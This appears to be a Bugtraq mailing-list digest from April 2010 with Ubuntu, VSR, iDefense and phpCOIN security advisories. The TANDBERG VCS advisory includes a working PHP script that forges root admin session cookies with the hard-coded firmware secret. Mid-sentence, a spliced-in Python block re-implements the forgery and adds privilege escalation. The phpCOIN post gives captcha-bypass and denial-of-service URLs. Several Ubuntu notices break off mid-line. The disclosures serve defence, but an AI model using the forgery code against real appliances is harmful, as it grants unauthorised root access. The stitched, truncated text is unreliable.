[USN-927-1] NSS vulnerability

2010-04-12 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-927-1 April 09, 2010
nss vulnerability
CVE-2009-3555
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  libnss3-1d  3.12.6-0ubuntu0.9.10.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3
protocols. If an attacker could perform a man in the middle attack at the
start of a TLS connection, the attacker could inject arbitrary content at
the beginning of the user's session. This update adds support for the new
renegotiation extension and will use it when the server supports it.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.diff.gz
  Size/MD5:    36589 0b0b4b8d1dd122093fa815d69efbc89e

http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.dsc
  Size/MD5: 1651 a0117f537999a8c5a29dac921fe3db19
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz
  Size/MD5:  5947630 da42596665f226de5eb3ecfc1ec57cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5:  3235746 038ea8c22fc1adcec7c6eb94a2666e7f

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5:  1234192 6ce9b85ed07528c77d924d8949c85774

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5:   263144 cb7c75294d9ce22ed463935759f8546a

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5:    17752 041cb0b8d9ef5e7dbb4a7b6b21c68fed

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5:   313120 9305a9fbe4473a5fbcb129052d3a9d5e

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_i386.deb
  Size/MD5:  3178260 f86edf83bfa1a693add3f9f9a5fce87d

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_i386.deb
  Size/MD5:  1119650 7ea6f3113550c23ff2d786e8bb6826a9

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_i386.deb
  Size/MD5:   260452 2be494403893cce2523e56003450381f

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_i386.deb
  Size/MD5:    17758 84b68d14e2edafa15c4d85251a234509

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_i386.deb
  Size/MD5:   299734 78c46aca04aae9369ba47dbbbd7b4ebb

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_lpia.deb
  Size/MD5:  3216586 542551cab0ad5b7d02469995f0138483

http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_lpia.deb
  Size/MD5:  1095640 673d9d626476508b78b1c01ec14da360

http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_lpia.deb
  Size/MD5:   259386 22bac19ca5b1faee3374cfa4d71ee0f6

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_lpia.deb
  Size/MD5:    17754 cf0945e1ee85107157e820fa4f1ee5c6

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_lpia.deb
  Size/MD5:   298426 25cb3017432736f8fe127efc2cef8235

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_powerpc.deb
  Size/MD5:  3325392 71aa8238fa81e9eda6405450e9a15389

http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_powerpc.deb
  Size/MD5:  1206786 5b3f8a2c91c7c8a58055f2bdf3b47ee3

http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_powerpc.deb
  Size/MD5:   261718 e0f60fafda404bbcd749a1279bdd2601

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_powerpc.deb
  Size/MD5:17758 ce3c85e4e6e53fff45bcbec8fac99ede

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_powerpc.deb
  Size/MD5:   310922 acc562396e43692d342d0c44fe7e9131

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_sparc.deb
  Size/MD5:  2967738 84df47285cec6cdb1

[USN-921-1] Firefox 3.5 and Xulrunner vulnerabilities

2010-04-12 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-921-1 April 09, 2010
firefox-3.5, xulrunner-1.9.1 vulnerabilities
CVE-2010-0173, CVE-2010-0174, CVE-2010-0175, CVE-2010-0176,
CVE-2010-0177, CVE-2010-0178, CVE-2010-0179, CVE-2010-0181,
CVE-2010-0182
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  firefox-3.5 3.5.9+nobinonly-0ubuntu0.9.10.1
  xulrunner-1.9.1 1.9.1.9+nobinonly-0ubuntu0.9.10.1

After a standard system upgrade you need to restart Firefox and any
applications that use Xulrunner to effect the necessary changes.

Details follow:

Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered
flaws in the browser engine of Firefox. If a user were tricked into viewing
a malicious website, a remote attacker could cause a denial of service or
possibly execute arbitrary code with the privileges of the user invoking
the program. (CVE-2010-0173, CVE-2010-0174)

It was discovered that Firefox could be made to access previously freed
memory. If a user were tricked into viewing a malicious website, a remote
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2010-0175,
CVE-2010-0176, CVE-2010-0177)

Paul Stone discovered that Firefox could be made to change a mouse click
into a drag and drop event. If the user could be tricked into performing
this action twice on a crafted website, an attacker could execute
arbitrary JavaScript with chrome privileges. (CVE-2010-0178)

It was discovered that the XMLHttpRequestSpy module as used by the Firebug
add-on could be used to escalate privileges within the browser. If the user
had the Firebug add-on installed and were tricked into viewing a malicious
website, an attacker could potentially run arbitrary JavaScript.
(CVE-2010-0179)

Henry Sudhof discovered that an image tag could be used as a redirect to
a mailto: URL to launch an external mail handler. (CVE-2010-0181)

Wladimir Palant discovered that Firefox did not always perform security
checks on XML content. An attacker could exploit this to bypass security
policies to load certain resources. (CVE-2010-0182)


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.diff.gz
  Size/MD5:   129770 0665849c341bbaeb43dc853328434d74

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.dsc
  Size/MD5: 2595 b31a13643a6699a0669164e5c812e874

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly.orig.tar.gz
  Size/MD5: 45825322 bdb27480034e67db569e8b0f4fe180be

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.diff.gz
  Size/MD5:    59497 700cd2dc3672792e073fa5dd2451a927

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.dsc
  Size/MD5: 2565 d6ac2e0d72309c2979a33e4e71c14971

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly.orig.tar.gz
  Size/MD5: 45124822 f3daad932b9fbf4b2fc33798e4c21e55

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73568 0f56708e218445e068269a9e1a9a6af6

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73422 567aa3f3c16b4564739c4bd77e446d93

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73416 f401b03d7e3c7ba1d3dcd1fe591adef1

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73416 eb00ecbb00c027b5f37fcb0e19f4909e

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73478 126936486b1bea1d490d6cc36b96acca

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73576 7212547851f9d203016dce0d233e8885

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/MD5:    73438 09052f4029acfb37574096c2b8f8e325

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb
  Size/

[USN-920-1] Firefox 3.0 and Xulrunner vulnerabilities

2010-04-12 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-920-1 April 09, 2010
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177,
CVE-2010-0178, CVE-2010-0179
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.19+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser        3.0.19+nobinonly-0ubuntu0.8.10.1
  firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9   1.9.0.19+nobinonly-0ubuntu0.8.10.1

Ubuntu 9.04:
  abrowser        3.0.19+nobinonly-0ubuntu0.9.04.1
  firefox-3.0 3.0.19+nobinonly-0ubuntu0.9.04.1
  xulrunner-1.9   1.9.0.19+nobinonly-0ubuntu0.9.04.1

After a standard system upgrade you need to restart Firefox and any
applications that use Xulrunner to effect the necessary changes.

Details follow:

Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered
flaws in the browser engine of Firefox. If a user were tricked into viewing
a malicious website, a remote attacker could cause a denial of service or
possibly execute arbitrary code with the privileges of the user invoking
the program. (CVE-2010-0174)

It was discovered that Firefox could be made to access previously freed
memory. If a user were tricked into viewing a malicious website, a remote
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2010-0175,
CVE-2010-0176, CVE-2010-0177)

Paul Stone discovered that Firefox could be made to change a mouse click
into a drag and drop event. If the user could be tricked into performing
this action twice on a crafted website, an attacker could execute
arbitrary JavaScript with chrome privileges. (CVE-2010-0178)

It was discovered that the XMLHttpRequestSpy module as used by the Firebug
add-on could be used to escalate privileges within the browser. If the user
had the Firebug add-on installed and were tricked into viewing a malicious
website, an attacker could potentially run arbitrary JavaScript.
(CVE-2010-0179)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:   106784 17f50b50fa9740c6fcf82c1feb3cd2de

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2387 33644ec48d3ef7a34135f12bfc6d30ef

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly.orig.tar.gz
  Size/MD5: 11605275 b1e129a58d29379376f04be1959b8268

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:    79855 2ce4812dc10be1191daa98476f468cb1

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2438 4f71c33a06184499d8ff99b1efb78d66

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly.orig.tar.gz
  Size/MD5: 42005942 92a0017fe802a917e67dbf5d05216d6f

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66558 f8afcac074ad9969983db51e54f61c16

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66568 378667968d1ed3f4345ba25a854930d4

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66534 145cc5ce4f031f08fb8515cce1ad9a05

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66520 e681baa33f03eb2e8cf35b542cb36a09

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66676 04ee6cea1699facb138145aed452c8c9

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66578 574947764c813c2ce224ac3a85b2663f

http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:    66526 56d1455d499d3088331019dd795f68dd

http://security.ubuntu.com/

CVE-2009-4509: TANDBERG VCS Authentication Bypass

2010-04-12 Thread Timothy D. Morgan
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                       Virtual Security Research, LLC.
                          http://www.vsecurity.com/
                             Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Authentication Bypass
 Release Date: 2010-04-09
  Application: Video Communication Server (VCS)
 Versions: x4.2.1 and possibly earlier
 Severity: Critical
Discovered by: Jon Hart and Timothy D. Morgan
  Advisory by: Timothy D. Morgan 
Vendor Status: Update released (without security advisory) on October 9, 2009
CVE Candidate: CVE-2009-4509
Reference: http://www.vsecurity.com/resources/advisory/20100409-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 "The Video Communication Server (VCS) is an integral part of the TANDBERG 
  Total Solution and is the center of the video communications network, 
  connecting the benefits of video conferencing and telepresence to other 
  communications environments including unified communications and IP Telephony
  networks."


Vulnerability Overview
----------------------
On December 2nd, VSR identified an authentication bypass vulnerability in 
TANDBERG's Video Communication Server, firmware version x4.2.1.  This 
vulnerability allows for the complete bypass of authentication in the
administrative web console.  Since this web interface can be used to execute 
arbitrary code on the appliance as root (via software updates), the severity is
considered critical.


Product Background
------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices.  The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates, 
along with number of other items.


Vulnerability Details
---------------------
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management.  In version x4.2.1 of the appliance firmware 
(and possibly earlier versions), it is possible to forge session cookies with
relatively little knowledge of the appliance's configuration.

The vulnerability lies in the files located at the following paths:
  /tandberg/web/lib/secure.php
  /tandberg/web/user/lib/secure.php

Routines in these files generate user session cookies in roughly the following
way:

SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH   = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH

In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is
the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp, 
and ACCESS_RIGHTS is an integer denoting the level of access assigned to the
user.

Note that none of the information above is difficult to guess.  Any owner of a 
TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is
contained in the firmware updates[2]).  All TANDBERG appliances have a default
user name of "admin" which has full privileges.  Therefore, it is possible with
a simple PHP script to forge new cookies and access the administrative
interface:

<?php
// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //

// Encode the session array the same way the appliance does:
// serialize -> gzcompress -> base64.
function objectToCookie($obj)
{
    $cookie = serialize($obj);
    $cookie = gzcompress($cookie);
    $cookie = base64_encode($cookie);
    return $cookie;
}

// Forge a cookie for the given VCS address and the address the
// request will come from. Only public values go into the hash.
function genCookie($server_addr, $remote_addr)
{
    $user_name = "root";
    // SECRET = SERVER_ADDRESS + STATIC_VALUE (hard-coded in the firmware)
    $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
    $time = time() + 24*60*60;
    $id_hash = md5($user_name . $secret . $remote_addr . $time);
    $access = 1; // ReadWrite

    $login_cookie =
        array( "user_name" => $user_name,
               "access"    => $access,
               "id_hash"   => $id_hash,
               "ip"        => $remote_addr,
               "time"      => $time
             );

    return objectToCookie($login_cookie);
}

print "Cookie: tandberg_login="
    . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}"))
    . "\n";
// end of script //


TANDBERG released firmware version x4.3.0 which corrects this issue on 
October 9, 2009 (prior to discovery of the vulnerability by VSR).  The release
notes[3] for this updated version contain a description of the issue:

"Improved the security of the web interface to ensure that the system will not,
 under any circumstances, allow an authenticated user to escalate their session
 to more
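The same forgery re-expressed in Python, as an added example rather than TANDBERG's code or VSR's script, placed beside a keyed construction that removes the flaw. STATIC_VALUE below is a placeholder, not the firmware string, and the rule that a cookie stays valid until its "time" field is an assumption about how the appliance checks expiry. The pseudocode in the advisory also shows ACCESS_RIGHTS sitting outside the hashed fields, so the example exercises that too: a low-privilege cookie can be edited to ReadWrite without knowing anything at all.

```python
"""Forgeable session cookie (advisory's scheme) next to a keyed, unforgeable one.

Added example, not TANDBERG's PHP. STATIC_VALUE is a placeholder for the
hard-coded firmware string; "valid until 'time'" is an assumed expiry rule.
"""
import base64
import hashlib
import hmac
import json
import os
import zlib

STATIC_VALUE = "placeholder-for-hard-coded-firmware-string"   # assumption: any fixed string


def _pack(payload):
    # serialize -> compress -> base64, mirroring objectToCookie() in the PHP above
    return base64.b64encode(zlib.compress(json.dumps(payload, sort_keys=True).encode())).decode()


def _unpack(cookie):
    return json.loads(zlib.decompress(base64.b64decode(cookie)))


def weak_hash(user, server_ip, client_ip, issued):
    # md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME), SECRET = SERVER_ADDRESS + STATIC_VALUE.
    # Nothing here is secret from someone who knows the server IP and owns any firmware image.
    return hashlib.md5(f"{user}{server_ip}{STATIC_VALUE}{client_ip}{issued}".encode()).hexdigest()


def weak_cookie(user, access, server_ip, client_ip, issued):
    return _pack({"user_name": user, "access": access, "ip": client_ip,
                  "time": issued, "id_hash": weak_hash(user, server_ip, client_ip, issued)})


def weak_verify(cookie, server_ip, client_ip, now):
    p = _unpack(cookie)
    ok = (p["ip"] == client_ip and p["time"] >= now
          and p["id_hash"] == weak_hash(p["user_name"], server_ip, client_ip, p["time"]))
    return p if ok else None


def escalate_weak(cookie, access=1):
    """'access' is not covered by id_hash, so editing it costs nothing."""
    p = _unpack(cookie)
    p["access"] = access
    return _pack(p)


# Hardened: per-install random key never derived from public values, an HMAC over every
# field authorization depends on, constant-time comparison, and an explicit expiry.
SERVER_KEY = os.urandom(32)   # generate at first boot; store with restricted permissions


def strong_cookie(user, access, client_ip, expires, key=SERVER_KEY):
    body = json.dumps({"user_name": user, "access": access, "ip": client_ip, "exp": expires},
                      sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body).decode() + "." + base64.urlsafe_b64encode(tag).decode()


def strong_verify(cookie, client_ip, now, key=SERVER_KEY):
    try:
        body_b64, tag_b64 = cookie.split(".")
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except (ValueError, TypeError):
        return None
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    p = json.loads(body)
    if p["ip"] != client_ip or p["exp"] < now:
        return None
    return p


def escalate_strong(cookie, access=1):
    """The same edit against the keyed cookie: the tag no longer matches."""
    body_b64, tag_b64 = cookie.split(".")
    p = json.loads(base64.urlsafe_b64decode(body_b64))
    p["access"] = access
    return base64.urlsafe_b64encode(json.dumps(p, sort_keys=True).encode()).decode() + "." + tag_b64


def forge_strong_without_key(user, access, client_ip, expires):
    """All an attacker can do against the keyed scheme: sign with a guessed key."""
    return strong_cookie(user, access, client_ip, expires, key=os.urandom(32))
```

weak_verify() accepts a cookie minted by anyone who knows the two IP addresses; strong_verify() rejects both the guessed-key forgery and the edited access field, and because the comparison is constant-time the tag cannot be recovered byte by byte either.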

Re: Vulnerabilities in phpCOIN

2010-04-12 Thread Susan Bradley

About Us:
http://phpcoin.com/mod.php?mod=siteinfo&id=4

It is with profound sorrow, sadness and regret, that COINSoft 
Technologies Inc. must announce the death of their lead developer 
Stephen M. Kitching (cantex) after a mercifully short battle with cancer.


Stephen was both an inspiration and good friend to everyone who knew and 
worked with him. He will be greatly missed, and his ingenuity and work 
will live on in the thoughts of all those, who were and will be touched, 
by the contributions he made to the software he dedicated his life to.


Our deepest sympathies, hearts and prayers go out to Steven's family and 
friends.


-

If I were a customer of theirs I'd be cutting them some slack.  I'm just 
sayin'.


MustLive wrote:

Hello Bugtraq!

I want to warn you about security vulnerabilities in the phpCOIN system.

-
Advisory: Vulnerabilities in phpCOIN
-
URL: http://websecurity.com.ua/4090/
-
Affected products: phpCOIN 1.6.5 and previous versions.
-
Timeline:
17.03.2010 - found vulnerabilities.
01.04.2010 - disclosed at my site.
02.04.2010 - informed developers.
-
Details:

These are Insufficient Anti-automation and Denial of Service
vulnerabilities.

The vulnerabilities exist in the captcha script CaptchaSecurityImages.php,
which is used in this system. I already reported vulnerabilities in
CaptchaSecurityImages (http://websecurity.com.ua/4043/).

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Captcha bypass is possible via half-automated or automated (using OCR)
methods, which were mentioned before (http://websecurity.com.ua/4043/).


DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it is possible to create a
large load on the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



iDefense Security Advisory 04.09.10: VMware VMnc Codec Heap Overflow Vulnerability

2010-04-12 Thread iDefense Labs
iDefense Security Advisory 04.09.10
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 09, 2010

I. BACKGROUND

VMware Inc. markets several virtualization products such as ACE, Player,
Server, and Workstation. These products include a video coder-decoder
(codec) called 'vmnc.dll', or VMware Movie Decoder, that is registered
on the host machine at installation time. This codec will be used
whenever video streams of the 'VMnc' type, such as those produced when
using VMware Workstation's "Capture Movie" feature, are encountered.
For more information, refer to the links shown below.

http://en.wikipedia.org/wiki/Codec

http://www.vmware.com/support/ws5/doc/ws_running_capture.html

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in
VMware Inc.'s movie decoder allows attackers to execute arbitrary code.

This vulnerability exists due to a lack of input validation when
processing certain specially crafted Audio-Video Interleave (AVI)
files. During processing, a heap buffer will be allocated based on one
part of the AVI file data. However, the amount of data copied into that
buffer is calculated based on a different part of the file. This leads
to an exploitable heap-based buffer overflow condition.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user running an application utilizing
the vulnerable codec. In order to reach the vulnerable code, a targeted
user must play a specially crafted AVI media file. An attacker typically
accomplishes this via social engineering or injecting content into
compromised, trusted sites.

IV. DETECTION

iDefense confirmed the existence of this vulnerability using the
following software.

  vmnc.dll version 6.5.2.7026 from Workstation 6.5.2
  vmnc.dll version 6.5.3. from Workstation 6.5.3

A full list of affected VMware products can be found in Security
Advisory VMSA-2010-0007.

V. WORKAROUND

Disabling the 'VMnc' codec will prevent exploitation. In order to do so,
import the 'disable-vmnc-codec.reg' registry file as follows.

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32]
  "VIDC.VMnc"=-

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
  "VIDC.VMnc"=-

VI. VENDOR RESPONSE

VMware Inc. has released patches to address this issue. Information
about downloadable vendor updates can be found by clicking on the URLs
shown.
http://lists.vmware.com/pipermail/security-announce/2010/90.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-1564 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/25/2009  Initial Vendor Notification
08/25/2009  Initial Vendor Reply
04/09/2010  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


[USN-927-2] NSS regression

2010-04-12 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-927-2 April 11, 2010
nss regression
https://launchpad.net/bugs/559881
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  libnss3-1d  3.12.6-0ubuntu0.9.10.2

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

USN-927-1 fixed vulnerabilities in NSS. Upstream NSS 3.12.6 added an
additional checksum verification on libnssdbm3.so, but the Ubuntu packaging
did not create this checksum. As a result, Firefox could not initialize the
security component when the NSS Internal FIPS PKCS #11 Module was enabled.
This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3
 protocols. If an attacker could perform a man in the middle attack at the
 start of a TLS connection, the attacker could inject arbitrary content at
 the beginning of the user's session. This update adds support for the new
 renegotiation extension and will use it when the server supports it.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.2.diff.gz
  Size/MD5:    36659 1c82d002115ed4a76dc98d33ef5c839c

http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.2.dsc
  Size/MD5: 1651 41544d2843858123ad5852de1587744c
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz
  Size/MD5:  5947630 da42596665f226de5eb3ecfc1ec57cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


